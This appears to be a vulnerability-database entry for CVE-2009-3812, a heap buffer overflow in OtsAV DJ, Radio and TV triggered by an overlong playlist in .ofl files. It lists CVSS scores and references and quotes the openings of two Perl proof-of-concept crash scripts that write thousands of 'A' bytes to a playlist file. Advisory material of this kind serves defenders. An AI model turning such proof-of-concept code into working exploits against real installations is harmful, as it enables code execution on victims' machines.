CVE-2009-3812

Published: 27/10/2009 Updated: 19/09/2017

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 940

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Heap-based buffer overflow in OtsAV DJ trial version 1.85.64.0, Radio trial version 1.85.64.0, TV trial version 1.85.64.0, and Free version 1.77.001 allows remote malicious users to execute arbitrary code via a long playlist in an Ots File List (.ofl) file.

Vulnerable Product	Search on Vulmon	Subscribe to Product
otslabs otsav radio 1.85.64.0
otslabs otsav dj 1.85.64.0
otslabs otsav tv 1.85.64.0

#!/usr/bin/perl # Found By :: HACK4LOVE # all i want say welcom back 3asfh # otsAV DJ 185064 (ofl File) Local Heap Overflow PoC # xdownloadotszonecom/static/otsavdjtrialsetupexe ######################################################################################## my $crash="\x41" x 5000; open(myfile,'>>hack4loveOFL'); print ...

----------------------------------the first Poc------------------------------------ #!/usr/bin/perl # OtsAv DJ [olf] Local Heap Overflow Poc # Down : serv-08downloadotszonecom/downloadcgi/otsavdjtrialsetupexe?A=13JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetupexe # Desc : 7000 A' Heap overflow # By Mountassif Moad aka ...

CWE-119 http://packetstormsecurity.org/0907-exploits/otsav-overflow.txt http://secunia.com/advisories/35738 http://www.vupen.com/english/advisories/2009/1861 http://osvdb.org/55747 https://exchange.xforce.ibmcloud.com/vulnerabilities/51628 http://www.exploit-db.com/exploits/9113 https://nvd.nist.gov https://www.exploit-db.com/exploits/9090/

CVE-2009-3812

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect